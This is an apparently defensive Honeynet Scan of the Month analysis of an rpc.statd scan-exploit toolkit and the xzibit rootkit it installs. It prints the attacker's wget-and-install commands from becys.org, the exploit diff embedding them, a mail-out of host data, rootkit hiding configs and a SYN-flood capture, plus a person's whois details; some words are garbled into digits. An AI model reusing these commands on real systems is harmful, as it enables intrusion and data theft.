This report attempts to answer the questions of the #13 Scan of the Month proposed by the Honeynet Project. For more information about this 0 go to http://project.honeynet.org/scans/scan13. An analysis of the rootkit installed on the systems compromised by this worm is also provided in this report, the rootkit file named xzibit.tar.gz was copied from the web site http://www.becys.org/ mentioned in the command executed on the compromised hosts. -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* 1. What is the blackhat attempting to do with his command line syntax? The command "luckgo" executed by the intruder expects to receive three numbers describing the network that will be scanned, these numbers represents the first octets of an ip 0, as an example to scan the network 192.168.254.0 you have to execute the following command: ---------------------------------------------------------------------- #./luckgo 192 168 254 ---------------------------------------------------------------------- The command executed by the intruder scans the 1 ranges of ip address: * 216.210.0.0 to 216.210.255.255 * 200.120.0.0 to 200.120.255.255 * 64.120.0.0 to 64.120.255.255 * 216.200.0.0 to 216.200.255.255 * 63.1.0.0 to 63.1.255.255 * 216.10.0.0 to 216.10.255.255 * 210.120.0.0 to 210.120.255.255 * 64.1.0.0 to 64.1.0.0 * 216.1.0.0 to 216.1.255.255 * 194.1.0.0 to 194.1.255.255 * 210.128.0.0 to 210 128.255.255 * 24.1.0.0 to 24.1.255.255 * 12.20.0.0 to 12.20.255.255 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* 2. What does the tool accomplish? This tool is used to 2 a range of ip address looking for the presence of the portmapper service (port 111), if this port is open and the host have is running a RedHat 6.2 version with a vulnerable version of the rpc.statd daemon a exploit will be executed and a rootkit installed and cleaned. The 0 of the rootkit will send a mail to the intruder telling about this new compromised host. More information about the rpc.statd vulnerability exploited by this rootkit can be found in the following web sites: * http://www.kb.cert.org/vuls/id/34043 * http://www.cert.org/advisories/CA-2000-17.html * http://www.securityfocus.com/bid/1480 * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0666 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* 3. How does the tool work? The file LUCKROOT.TAR downloaded by the intruder contains five files, below is shown the type and checksums of these files: ---------------------------------------------------------------------- luckgo: Bourne shell script text luckscan-a: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped luckscan-a.c: C program text luckstatdx: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped luckstatdx.c: C program text 0a2d4298ccb41bd373e78d5e4352ff87 luckgo b36e9546ef43e8d0c2f81f9be1941548 luckscan-a d45ce49e8fb022f1e07e301adbc34f62 luckscan-a.c 841edfb338ce9461d9f3985d9adfe67b luckstatdx 92a17e0d029193ad40981002b6cb8926 luckstatdx.c ---------------------------------------------------------------------- The script luckgo is the primary interface of the toolkit, his work is to perform three steps: 1. Receives until three arguments that represents the first octets of an ip address. 2. Checks for the existence of the binary files luckstatdx and luckscan-a and if these files does not exist creates then. 3. Executes the file luckscan-a passing as arguments the octets received and the number 111, which represents the port to scan. The tool luckscan-a is a portscanner that looks for a port in a given range of ip address and if this port is open, it tries to execute the exploit luckstatdx. The arguments used to start this tool were received from the script luckgo and represents the octets of the ip address and the 1 port to scan. The following line was taken from the luckgo script and it's the line used to start this scan: ---------------------------------------------------------------------- ./luckscan-a $1 111 $2 $3 ---------------------------------------------------------------------- As we can see the arguments received by the script are being passed to the scanner. The added argument (111) is the portmap port number which will be scanner by the luckscan-a One thing to note is that the command line which executes the exploit luckstatdx specifies the switch "-d 0", reading the source of this exploit this specify the target as a RedHat 6.2 system. The exploit luckstatdx is the last tool executed, it 1 tries to gain root status in the scanned host trying to explore the rpc.statd vulnerability (BUGTRAQ ID 1480) if it 0 it will open a shell and execute the 1 commands: ---------------------------------------------------------------------- # cd / # uname -a # id # wget -nd http://www.becys.org/xzibit.tar.gz # tar -zxvf xzibit.tar.gz # cd lamerk # ./install # cd / # rm -rf lamerk xzibit.tar.gz ---------------------------------------------------------------------- As we can see these command copies a package, extracts it and execute a file named "install", after that it cleans itself. I'd make the download of the file xzibit.tar.gz and the analysis of the files contained in the package is shown below. The package when extracted creates a directory called lamerk and creates the following files: ---------------------------------------------------------------------- lamerk/becys.cgi: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped lamerk/hdparm: Bourne shell script text lamerk/ifconfig: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped lamerk/install: Bourne shell script text lamerk/linsniffer: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped lamerk/logclear: ASCII text lamerk/netstat: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped lamerk/ps: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped lamerk/s: ASCII text lamerk/sense: perl script text lamerk/sl2: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped lamerk/ssh_host_key: data lamerk/ssh_random_seed: data lamerk/sshdu: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped lamerk/top: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped 202a51b16ac8d1b4dc75de89e7344ed4 lamerk/becys.cgi a8caf6a5d3b38a6819d57fe90cffe6a0 lamerk/hdparm 086394958255553f6f38684dad97869e lamerk/ifconfig 042d413b164982037f21bf4671623938 lamerk/install 6c0f96c1e43a23a21264f924ae732273 lamerk/linsniffer 5f22ceb87631fbcbf32e59234feeaa5b lamerk/logclear 2b07576213c1c8b942451459b3dc4903 lamerk/netstat 7728c15d89f27e376950f96a7510bf0f lamerk/ps 2cd5a033331802ca763882ca44227951 lamerk/s 464dc23cac477c43418eb8d3ef087065 lamerk/sense 4cfae8c44a6d1ede669d41fc320c7325 lamerk/sl2 ec411d19fb0cd1c45e2e63f9a978315d lamerk/ssh_host_key a869d3599328d53387328ab6c254e314 lamerk/ssh_random_seed 22eb6d3381a60a850d99b971f93966cc lamerk/sshdu 8ff0939cd49a0b2ef3156c7876afca4b lamerk/top ---------------------------------------------------------------------- The file install first executed by the intruder is a shell script that does the following actions: 1 - The shell variable HISTFILE is unset which causes the command history not to be saved. 2 - The owner and group of the files contained in the package are changed to root:root. 3 - The system files "ifconfig","netstat","ps", and "top" are 0 by the trojaned versions contained in the package. 4 - Two files called /dev/dsx and /dev/caca are created and various "echo" commands are used to write to these files. The commands executed are the following: ---------------------------------------------------------------------- touch /dev/dsx >/dev/dsx echo "3 sl2" >>/dev/dsx echo "3 sshdu" >>/dev/dsx echo "3 linsniffer" >>/dev/dsx echo "3 smurf" >>/dev/dsx echo "3 slice" >>/dev/dsx echo "3 mech" >>/dev/dsx echo "3 muh" >>/dev/dsx echo "3 bnc" >>/dev/dsx echo "3 psybnc" >> /dev/dsx touch /dev/caca >/dev/caca echo "1 193.231.139" >>/dev/caca echo "1 213.154.137" >>/dev/caca echo "1 193.254.34" >>/dev/caca echo "3 6969" >>/dev/caca echo "3 3666" >>/dev/caca echo "3 31221" >>/dev/caca echo "3 22546" >>/dev/caca echo "4 6969" >>/dev/caca echo "4 2222" >>/dev/caca echo "Done" ---------------------------------------------------------------------- As we can note the syntax of these files is the same used by the lrk4 (The Linux Rootkit Version 4) The file /dev/dsx is a configuration file that instructs the trojaned versions of "ps" and "top" to hide the processes named. The file /dev/caca is the configuration file used by the trojaned version of 2, it says to hide connections (i) from the networks 193.231.139, 213.154.137 and 193.254.34, (ii) to the local ports 6969, 3666, 31221, 22546 and (iii) to the remote ports 6969 and 2222. 5 - A directory called /dev/inet/.ida is created and the files linsniffer, logclear, sense, sl2, sshdu, s, ssh_host_key, ssh_random_seed are moved into there and the file tcp.log is created in the same directory. 6 - A command line instructing the execution of the file /usr/bin/hdparm is inserted in the file /etc/init.d/rc.sysinit 7 - The script file 0 is copied into the directory /usr/bin 8 - The file system is scanned for the existence of the cgi-bin directory, common places are verified and if the directory is found the file becys.cgi is copied to this directory. 9 - Network and system information are placed in the file /tmp/info and this file is mailed to the account becys@becys.org. The commands executed are the following: ---------------------------------------------------------------------- touch /tmp/info /sbin/ifconfig | grep inet >> /tmp/info hostname -f >> /tmp/info uname -a >> /tmp/info cat /tmp/info | mail -s "becys rewting" becys@becys.org rm -f /tmp/info ---------------------------------------------------------------------- 10 - The last action taken by the script is to clean the packages and the files used in the 0 of the rootkit. The file becys.cgi is a cgi script that tries to set its uid and gid to 0 (root) and execute the command specified by the intruder. It's important to note that this script needs root permission to raise his permissions, so the web server has to be running under the root account or the intruder has to modify the permissions of the script. If neither of these actions are taken the commands are executed under the account that is running the web server. The image file becys-cgi.jpg located in this same directory shows the html interface of this script and below is shown the output of the strace command. .... getpid() = 10652 brk(0) = 0x8049c0c brk(0x8049d24) = 0x8049d24 brk(0x804a000) = 0x804a000 setuid(0) = -1 EPERM (Operation not permitted) setgid(0) = -1 EPERM (Operation not permitted) fstat(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(4, 1), ...}) = 0 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000 ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0 write(1, "\n", 7) = 7 write(1, "\n", 7) = 7 write(1, "\n", 15) = 15 munmap(0x40014000, 4096) = 0 _exit(0) = ? .... The script file hdparm is executed by the intruder during the installation of this rootkit and the initialization files of the system are modified to guarantee that this script will be executed when this system boots. This script executes the files sshdu, which is used by the intruder to access the compromised system, and the file linsniffer which is the sniffer installed by the intruder. The contents of this file ae shown below: ---------------------------------------------------------------------- #!/bin/sh cd /dev/ida/.inet ./sshdu -f ./s ./linsniffer >> ./tcp.log & cd / ---------------------------------------------------------------------- The file ifconfig is a trojaned version that hides from the user that the network interface is in 0 mode, this file is probably the same that is present in the lrk4 (The Linux Rootkit Version 4). The files ps, netstat and top are trojaned versions that hides from the user processes and 0 connections specified by the intruder. More information can be found in the analysis of the "install" script in the section number 4. The strings found in the binaries show that the configuration files /dev/caca and /dev/dsx are referenced by these files. Like the file ifconfig these files are probably the same from the lrk4 (The Linux Rootkit Version 4). The strings found in these files are shown below: ---------------------------------------------------------------------- # strings ps .... u$hW }(h& PRQSh 90tO t%VW 8&t/F8&t*F8&t%F /dev/dsx NR PID STACK ESP EIP TMOUT ALARM STAT TTY TIME COMMAND PID TTY MAJFLT MINFLT TRS DRS SIZE SWAP RSS SHRD LIB DT COMMAND PID TTY STAT TIME PAGEIN TSIZ DSIZ RSS LIM %MEM COMMAND UID PID SIGNAL BLOCKED IGNORED CATCHED STAT TTY TIME COMMAND PPID PID PGID SID TTY TPGID STAT UID TIME COMMAND USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND FLAGS UID PID PPID PRI NI SIZE RSS WCHAN STA TTY TIME COMMAND PID TTY STAT TIME COMMAND sort unrecognized long sort option help version ps: unknown long option short form sort flag parse error unrecognized option or trailing garbage the name `%s' is not a tty %susage: ps -acehjlnrsSuvwx{t|#|O[-]u[-]U..} \ --sort:[-]key1,[-]key2,... --help gives you this message --version prints version information COMMAND %04.4x No processes available. %5d %3s %s %-9x %-11.11s %6x %5d %5d %5d %3d %3d %6d %5d %-11.11s %s%3s %5d %5d %5d %5d %3s %5d %s %5d %5d %-8s %5d %2u.%u %2d.%d %5d %5d %2s %s%.6s %5d %5d %08x %08x %08x %08x %s %3s %6d %4d %4d %4d xx %5d %2d.%d %5d %3s %6d %6d %5d %5d %5d %5d %5d %5d %5d %3d %2d %5d %8x %8x %8x %s %s %s %3s ... ---------------------------------------------------------------------- ---------------------------------------------------------------------- # strings top ... Page Fault Count Nice Value Priority Controlling tty Memory Usage CPU Usage User Name User Id Parent Process Id Process Id /dev/dsx Wrong configuration option %c /etc/toprc HOME HOME .toprc AbcDgHIjklMnoTPqrsuzVYEFWX TERM VT100 top: ioctl() failed cannot put tty into raw mode top: Bad delay time `%s' top: Bad delay time `%s' -d requires an argument top: setpriority() failed top: Unknown argument `%c' %s%s%s%s That's not a number! %s%s%s%s That's not a float! Current Field Order: %s %c %c: %-10s = %s Current Field Order: %s Upper case characters move a field to the left, lower case to the right Current Field Order: %s Toggle fields with a-x, any other key to return: ---------------------------------------------------------------------- ---------------------------------------------------------------------- # strings netstat ... 8&t/F8&t*F8&t%F +NEW_ADDRT +RTF_IRTT +RTF_REJECT +RT_NETLINK +FW_MASQUERADE -NLS AF:(inet) +UNIX +INET +IPX -AX25 -NETROM -ATALK HW: +ETHER +ARC +SLIP +PPP +TUNNEL -TR -AX25 -NETROM -FR Linux NET-3 Base Utilities Source: net-tools 1.32-alpha net-tools@lina.inka.de (Bernd Eckenfels) Kernelsource: 2.0.35 netstat 1.19 (1996-05-17) Fred Baumgarten and Alan Cox. /dev/caca /dev/route netstat %s: no support for `%s' on this system. Netlink Kernel Messages (continous) read /dev/route net-tools@lina.inka.de (Bernd Eckenfels) netlink message size mismatch netstat.c %s: Internal Error `%s'. Contact: %s NEWROUTE DELROUTE NEWDEVICE DELDEVICE UNKNOWN%lx %s/%s 0x%x %d ---------------------------------------------------------------------- The binary file linsniffer is a network sniffer. The source for this file can be found in the lrk4 (The Linux Rootkit Version 4) distribution. The default 0 of this sniffer is to log 0 from ftp, telnet, imap2, rlogin, pop2 and pop3 sessions. The ASCII file logclear contains shell commands used to clean the log files generated by the linsniffer (tcp.log file) it kills the linsniffer process deletes and creates an empty tcp.log file and starts the sniffer again. The files sshdu, s, ssh_host_key and ssh_random_seed are respectively the ssh daemon, the sshd configuration file, the private key of the daemon and the random seed. This is a trojaned daemon used by the intruder to access the machine remotely, the configuration file is setup to listen on port 6969. The file sense is a perl script that parses the output generated by linsniffer it looks for the usernames and passwords collected by the linsniffer. The file sl2 is a denial of service tool that sends a SYN flood to a 3 host, source hosts can be randomized and you can give a port range to be attacked. Below is shown a network capture of the activity generated by this tool you can note that the hosts are randomized and the ports are incremented in agree with the command line. The command line used to start the tool was "./sl2 0 192.168.254.32 0 139". ---------------------------------------------------------------------- --== Initializing Snort ==-- TCPDUMP file reading mode. Reading network traffic from "snort-0311@0038.log" file. snaplen = 1514 --== Initialization Complete ==-- 03/11-00:38:28.548709 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36 13.78.227.187:12978 -> 192.168.254.32:1 TCP TTL:30 TOS:0x0 ID:65081 IpLen:20 DgmLen:40 ******S* Seq: 0x37AB17AB Ack: 0x0 Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.548721 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36 56.139.190.165:2274 -> 192.168.254.32:0 TCP TTL:30 TOS:0x0 ID:21459 IpLen:20 DgmLen:40 ******S* Seq: 0x2B659215 Ack: 0x0 Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.548909 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36 61.249.122.180:38310 -> 192.168.254.32:2 TCP TTL:30 TOS:0x0 ID:5782 IpLen:20 DgmLen:40 ******S* Seq: 0x185AC415 Ack: 0x0 Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.548954 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C 192.168.254.32:1 -> 13.78.227.187:12978 TCP TTL:128 TOS:0x0 ID:61812 IpLen:20 DgmLen:40 ***A*R** Seq: 0x0 Ack: 0x37AB17AC Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.549188 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36 12.240.167.89:21997 -> 192.168.254.32:3 TCP TTL:30 TOS:0x0 ID:39765 IpLen:20 DgmLen:40 ******S* Seq: 0x753FF080 Ack: 0x0 Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.549089 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C 192.168.254.32:0 -> 56.139.190.165:2274 TCP TTL:128 TOS:0x0 ID:62068 IpLen:20 DgmLen:40 ***A*R** Seq: 0x0 Ack: 0x2B659216 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.549163 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C 192.168.254.32:2 -> 61.249.122.180:38310 TCP TTL:128 TOS:0x0 ID:62324 IpLen:20 DgmLen:40 ***A*R** Seq: 0x0 Ack: 0x185AC416 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.549415 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36 101.22.7.157:52422 -> 192.168.254.32:4 TCP TTL:30 TOS:0x0 ID:53410 IpLen:20 DgmLen:40 ******S* Seq: 0x66000A43 Ack: 0x0 Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.549397 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C 192.168.254.32:3 -> 12.240.167.89:21997 TCP TTL:128 TOS:0x0 ID:62580 IpLen:20 DgmLen:40 ***A*R** Seq: 0x0 Ack: 0x753FF081 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.549642 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36 117.168.88.130:6971 -> 192.168.254.32:5 TCP TTL:30 TOS:0x0 ID:12278 IpLen:20 DgmLen:40 ******S* Seq: 0x3B80033D Ack: 0x0 Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.549622 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C 192.168.254.32:4 -> 101.22.7.157:52422 TCP TTL:128 TOS:0x0 ID:62836 IpLen:20 DgmLen:40 ***A*R** Seq: 0x0 Ack: 0x66000A44 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.549861 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36 47.237.232.109:12130 -> 192.168.254.32:6 TCP TTL:30 TOS:0x0 ID:26599 IpLen:20 DgmLen:40 ******S* Seq: 0x5EC38321 Ack: 0x0 Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.549848 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C 192.168.254.32:5 -> 117.168.88.130:6971 TCP TTL:128 TOS:0x0 ID:63092 IpLen:20 DgmLen:40 ***A*R** Seq: 0x0 Ack: 0x3B80033E Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.550081 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36 125.8.54.138:19933 -> 192.168.254.32:7 TCP TTL:30 TOS:0x0 ID:32248 IpLen:20 DgmLen:40 ******S* Seq: 0x2DE1E6E3 Ack: 0x0 Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.550066 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C 192.168.254.32:6 -> 47.237.232.109:12130 TCP TTL:128 TOS:0x0 ID:63348 IpLen:20 DgmLen:40 ***A*R** Seq: 0x0 Ack: 0x5EC38322 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.550300 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36 78.203.99.179:28011 -> 192.168.254.32:8 TCP TTL:30 TOS:0x0 ID:53217 IpLen:20 DgmLen:40 ******S* Seq: 0x6E43F951 Ack: 0x0 Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.550285 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C 192.168.254.32:7 -> 125.8.54.138:19933 TCP TTL:128 TOS:0x0 ID:63604 IpLen:20 DgmLen:40 ***A*R** Seq: 0x0 Ack: 0x2DE1E6E4 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.550549 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36 131.49.148.248:40940 -> 192.168.254.32:9 TCP TTL:30 TOS:0x0 ID:4057 IpLen:20 DgmLen:40 ******S* Seq: 0x46A1657B Ack: 0x0 Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.550504 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C 192.168.254.32:8 -> 78.203.99.179:28011 TCP TTL:128 TOS:0x0 ID:63860 IpLen:20 DgmLen:40 ***A*R** Seq: 0x0 Ack: 0x6E43F952 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.550770 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36 208.40.184.255:33697 -> 192.168.254.32:10 TCP TTL:30 TOS:0x0 ID:2325 IpLen:20 DgmLen:40 ******S* Seq: 0x4D7B06C Ack: 0x0 Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.550755 0:10:A4:B4:DB:34 -> 0:E0:7D:8E:11:2A type:0x800 len:0x3C 192.168.254.32:9 -> 131.49.148.248:40940 TCP TTL:128 TOS:0x0 ID:64116 IpLen:20 DgmLen:40 ***A*R** Seq: 0x0 Ack: 0x46A1657C Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-00:38:28.550966 0:0:D1:10:97:77 -> 0:10:A4:B4:DB:34 type:0x800 len:0x36 252.3.141.122:31428 -> 192.168.254.32:11 TCP TTL:30 TOS:0x0 ID:30732 IpLen:20 DgmLen:40 ******S* Seq: 0x4BC15404 Ack: 0x0 Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* 4. Is this tool a worm, or would you classify it as something else? No, this tool isn't a worm. A worm has the main feature of copying itself to the compromised machine, this tool goes to a web site downloads a rootkit install it and alert the intruder it could be used to install a large base of DDoS tools. I'll classify this tool as an A.S.E.I.T (automated scan, exploit and install toolkit :-)) ). -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? From the files contained in the package LUCKROOT.TAR the script luckgo and the scanner luckstatd-a appears to be developed by the intruder that has be using it (becys), the exploit luckstatdx is based on the exploit statdx.c coded by ron1n below is shown the diff between the two files and we can note that only the command that will be executed and some strings printed by the tool were modified. The original exploit is included in this same directory. ----------------------------------------------------------------------A mjabbur@uakti:~/honeynet$ diff statdx.c luckroot/luckstatdx.c 162c162 < fprintf(stderr, "statdx by ron1n \n"); --- > fprintf(stderr, "statdx modify by becys \n"); 187c187 < --- > // Becys was modify herre some cmd. 189,190c189,190 < send(sockd, "cd /; ls -alF; id;\n", 19, 0); < --- > send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0); > // Aici cred ca trebuie un exit. 250c250 < printf("OMG! You now have rpc.statd technique!@#$!\n"); --- > printf("You now have a new server rooted with rpc.statd technique and becys|ReSpEkT scan-h4x0r !\n"); 498c498 < printf("A timeout was expected. Attempting connection to shell..\n"); --- > printf("Hmm,maibe i can root it. Attempting connection to shell..\n"); 500c500 < printf("Failed\n"); --- > printf("Fucking shit,i cant,sorry.\n"); 512d511 < ---------------------------------------------------------------------- The files contained in the rootkit (xzibit.tar.gz) installed by this toolkit with the exception of the script file install are based on tools that can be found on the internet, as an example we could say that the trojaned versions of the system's files ps, netstat, ifconfig, top and the sniffer linsniffer are the files contained in the lrk4 (Linux Rootkit Version 4). -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* 6. What information can you obtain about who is using or created the tool? In the files luckgo and luckstatdx.c references are done to a guy named becys, a domain named becys.org and a mail becys@becys.org also the rootkit installed by the exploit luckstatdx is copied from the host http://www.becys.org. The whois information about this domain is shown below: ---------------------------------------------------------------------- mjabbur@uakti:~/honeynet$ whois becys.org Whois Server Version 1.3 Domain names in the .com, .net, and .org domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: BECYS.ORG Registrar: BULKREGISTER.COM, INC. Whois Server: whois.bulkregister.com Referral URL: www.bulkregister.com Name Server: NS.WEBSITESOURCE.COM Name Server: NS2.WEBSITESOURCE.COM Updated Date: 11-sep-2000 >>> Last update of whois database: Mon, 12 Mar 2001 08:27:36 EST <<< The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and Registrars. Found InterNIC referral to whois.bulkregister.com. bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Domain Name: BECYS.ORG Administrative Contact: Qian Wang becys@yahoo.com bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Phone- (979)862-9233 Fax- Technical Contact: Web Site Source, In info@websitesource.com Web Site Source, Inc. 2476 Bolsover, Suite 484 Houston, TX 77005-2518 US Phone- 713-667-2520 Fax- 800-863-6499 Record updated on 2000-09-11 00:00:00. Record created on 2000-09-11. Record expires on 2002-09-11. Database last updated on 2001-03-12 23:46:48 EST. Domain servers in listed order: NS.WEBSITESOURCE.COM 216.147.43.135 NS2.WEBSITESOURCE.COM 216.147.1.116 ---------------------------------------------------------------------- The Technical Contact for this domain belongs to the Company called Web Site Source, which provide web services in the region of Houston, TX, it seems however that this is service provided by the Company and that they do not have anything related to the domain. The Administrative contact has a e-mail address named becys@yahoo.com, the user name is the same of the domain and mail referenced in the tools which lead us to think that this guy is who we are looking for. In the beginning of March I've visited the web site located at http://www.becys.org and I didn't find any information that could give us more details about the attacker. In March, 14 this web site has a new message saying the following "This account has been disabled. To have the account restored, Contact Customer Service", this can mean two things or the attacker has shutdown the web site or the Company Web Site Source did so. The best thing to do if further investigation is needed is to try to find the Administrative Contact listed in the whois information and to contact the ISP used to host the site.